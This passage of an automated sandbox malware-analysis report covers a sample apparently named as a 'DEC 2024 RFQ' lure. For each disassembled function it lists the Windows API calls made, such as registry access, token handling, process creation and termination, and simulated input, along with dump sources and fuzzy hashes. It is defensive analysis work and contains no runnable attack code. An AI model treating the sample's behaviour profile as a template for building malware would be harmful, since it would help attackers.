                                                                                                                      • Instruction ID: e7616387f8b798f1a44983bb1f34a78c230604444a161835a1fe20d649b9ef54
                                                                                                                      • Opcode Fuzzy Hash: 599ec97806e7b444b2a834f83ac3cfcf206cec9e054302cb5f6be3a728d42d30
                                                                                                                      • Instruction Fuzzy Hash: E8E092B0681741AFFB60AFA2ED4DB553AA4B715B42F1044A8FA01EA0A0CBBA46009A14
                                                                                                                      Function 000864B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                                                                      • Instruction ID: 800f886b771fdf73876ff6dc05fb4f1fff01933e3c880c5a0a7b2a6a9ba05d6f
                                                                                                                      • Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
                                                                                                                      • Instruction Fuzzy Hash: 9061AC709006AA9BCF11FF60DC81EFE3BA5BF05308F054568F9996B293EB35A815CB54
                                                                                                                      Function 000A01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A02BD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A02FD
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000A0320
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000A0349
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000A038C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A0399
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: 1e42d02b5e4f460cb94f9338842a5c3b37a4780b04777756d3ee5db0d1a47a53
                                                                                                                      • Instruction ID: 385d567f4a4f9e04b06998bf06161a319f71f0f423fd6fae11a84a781b01c6d9
                                                                                                                      • Opcode Fuzzy Hash: 1e42d02b5e4f460cb94f9338842a5c3b37a4780b04777756d3ee5db0d1a47a53
                                                                                                                      • Instruction Fuzzy Hash: 0F514971108305AFDB14EFA4D885EAEBBE9FF86314F04491DF585872A2DB31E905CB52
                                                                                                                      Function 000A5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 000A57FB
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 000A5832
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000A585A
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000A58C9
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 000A58D7
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 000A5928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: 15442941ec158b527ea82150fd9eff3905993433cee85c7f8bae7fef2e0702f3
                                                                                                                      • Instruction ID: 2871cc754546e77ce1d48f4c9ccbe10ca06070d8b0cd93d54f4db351fa0af88a
                                                                                                                      • Opcode Fuzzy Hash: 15442941ec158b527ea82150fd9eff3905993433cee85c7f8bae7fef2e0702f3
                                                                                                                      • Instruction Fuzzy Hash: 39516B75E00A16AFCF11EFA4C845AEEB7B4FF49721F144069E841BB352CB34AE418B94
                                                                                                                      Function 0007EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0007EF06
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 0007EF78
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0007EFD3
                                                                                                                      • _memmove.LIBCMT ref: 0007EFFD
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0007F04A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0007F078
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 08ab6883d432d30434ce2250578cd7b7b68e0a7a76ba2ae275207b05b5e21653
                                                                                                                      • Instruction ID: 33a951a2801063739718a8c9762641d296d54db2ccfab0fc0ae0d7f423f99a79
                                                                                                                      • Opcode Fuzzy Hash: 08ab6883d432d30434ce2250578cd7b7b68e0a7a76ba2ae275207b05b5e21653
                                                                                                                      • Instruction Fuzzy Hash: BE514AB5A0020AEFDB14CF58C884AAAB7F8FF4D314B158569E959DB301E735E911CFA0
                                                                                                                      Function 0008220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082258
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000822A3
                                                                                                                      • IsMenu.USER32(00000000), ref: 000822C3
                                                                                                                      • CreatePopupMenu.USER32 ref: 000822F7
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00082355
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00082386
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 3b2877ba501a9965886d7e40c2aa4657cba96237442870f8b34e76d18ef85766
                                                                                                                      • Instruction ID: be2b7c011f14f80ab18c77d934035ca0a82d5498373ab724edc38be46db26264
                                                                                                                      • Opcode Fuzzy Hash: 3b2877ba501a9965886d7e40c2aa4657cba96237442870f8b34e76d18ef85766
                                                                                                                      • Instruction Fuzzy Hash: 9A51C070A0070AEFDF21EF68D898BADBBF5FF46314F104129E891A7291D7789A44CB51
                                                                                                                      Function 00021765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0002179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000217FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0002181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0002182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 00021876
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 29ce087607b4085150aa5732877452b3df4885a92820bd650438c59bbc62316d
                                                                                                                      • Instruction ID: ee14657c35df12f07d58bc4a4abd17516894a9447270d5786484f089dccbea66
                                                                                                                      • Opcode Fuzzy Hash: 29ce087607b4085150aa5732877452b3df4885a92820bd650438c59bbc62316d
                                                                                                                      • Instruction Fuzzy Hash: E441D230104751AFD720DF24DCC4FFA7BE8EB5A725F140629F9A49B2A2CB349845DB61
                                                                                                                      Function 000AB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(000E57B0,00000000,016F5690,?,?,000E57B0,?,000AB5A8,?,?), ref: 000AB712
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 000AB736
                                                                                                                      • ShowWindow.USER32(000E57B0,00000000,016F5690,?,?,000E57B0,?,000AB5A8,?,?), ref: 000AB796
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,000AB5A8,?,?), ref: 000AB7A8
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 000AB7CC
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 000AB7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 522e26c5d57ffa8569c3485f6354ecb90967ff70c4ce1fb741356f9ab36e7540
                                                                                                                      • Instruction ID: db2536f33cf567578e09307662dadfc5a980cc361943e25242334ed47a83e7ae
                                                                                                                      • Opcode Fuzzy Hash: 522e26c5d57ffa8569c3485f6354ecb90967ff70c4ce1fb741356f9ab36e7540
                                                                                                                      • Instruction Fuzzy Hash: 93418334608641AFDB62CFA4C499BA87BE1FF46310F1841B9F9488F6A3C771AC56DB50
                                                                                                                      Function 0009709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00094E41,?,?,00000000,00000001), ref: 000970AC
                                                                                                                        • Part of subcall function 000939A0: GetWindowRect.USER32(?,?), ref: 000939B3
                                                                                                                      • GetDesktopWindow.USER32 ref: 000970D6
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000970DD
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0009710F
                                                                                                                        • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      • GetCursorPos.USER32(?), ref: 0009713B
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00097199
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 7bf15df48d3486a01b5cbb8cd10eed533a3dd2650e328e81cb9c9b6b07feddfb
                                                                                                                      • Instruction ID: 53aa4c03bbe4e7368ec8e47f0783a40f4845bf62484b2779b5d9176c9e3f72ab
                                                                                                                      • Opcode Fuzzy Hash: 7bf15df48d3486a01b5cbb8cd10eed533a3dd2650e328e81cb9c9b6b07feddfb
                                                                                                                      • Instruction Fuzzy Hash: B9310432508706ABDB20DF54CC49F9BB7E9FF89314F000919F58997192CB74EA08CB92
                                                                                                                      Function 00078879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000780C0
                                                                                                                        • Part of subcall function 000780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000780CA
                                                                                                                        • Part of subcall function 000780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000780D9
                                                                                                                        • Part of subcall function 000780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000780E0
                                                                                                                        • Part of subcall function 000780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000780F6
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,0007842F), ref: 000788CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000788D6
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000788DD
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000788F6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0007842F), ref: 0007890A
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00078911
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: ac8710aed18eb3da9abc19da6a7825f030e4a5c2c65f361a2819c98cb1e09699
                                                                                                                      • Instruction ID: 87ec56564f96eaba04fcfbc681648073ab34d86c9245172a38010f067cc52d12
                                                                                                                      • Opcode Fuzzy Hash: ac8710aed18eb3da9abc19da6a7825f030e4a5c2c65f361a2819c98cb1e09699
                                                                                                                      • Instruction Fuzzy Hash: A311B171A4160AFFEB509FA4DC0DFBE7BA8EB45311F14C028E98997110CB3A9D00DB65
                                                                                                                      Function 000785B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000785E2
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000785E9
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000785F8
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00078603
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00078632
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00078646
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: 87a58d2219f29ab9ff872487b8c87463e0500987c418fa4a1c3120fcdbabdbdf
                                                                                                                      • Instruction ID: 952c5aeb9a5cb55bce703648018c4892ce4ba9b33be514b8d79c240737a6466d
                                                                                                                      • Opcode Fuzzy Hash: 87a58d2219f29ab9ff872487b8c87463e0500987c418fa4a1c3120fcdbabdbdf
                                                                                                                      • Instruction Fuzzy Hash: 29115C7254024EABEF018FA4DD49FEE7BA9EF09304F048064FE04A2160C7798E60DB60
                                                                                                                      Function 0007B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0007B7B5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0007B7C6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0007B7CD
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0007B7D5
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0007B7EC
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0007B7FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: ba2bee1c1272609b8def7d070ef5978f6917c457e489bfb1e974a225ba2b27e0
                                                                                                                      • Instruction ID: a54ece0ceb7f0a2962a0d7f1b1dc4da44b814d3234cec1b6003c29a6e8acf002
                                                                                                                      • Opcode Fuzzy Hash: ba2bee1c1272609b8def7d070ef5978f6917c457e489bfb1e974a225ba2b27e0
                                                                                                                      • Instruction Fuzzy Hash: 9A018475E00609BBEB109BE69C45B6EBFB8EB49351F008075FA08A7291D6749C00CF90
                                                                                                                      Function 00040162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00040193
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0004019B
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000401A6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000401B1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000401B9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000401C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: a3dd68cb347b08e3eecc882c7db1fbf60681390a3c537b6c272eb1412aaa4d51
                                                                                                                      • Instruction ID: 8b3120cef0d595622393c5a407dbba301d618176fb8a84b00c962eafbe39f4ba
                                                                                                                      • Opcode Fuzzy Hash: a3dd68cb347b08e3eecc882c7db1fbf60681390a3c537b6c272eb1412aaa4d51
                                                                                                                      • Instruction Fuzzy Hash: 26016CB0901B5A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                      Function 000853E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000853F9
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0008540F
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0008541E
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0008542D
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00085437
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0008543E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
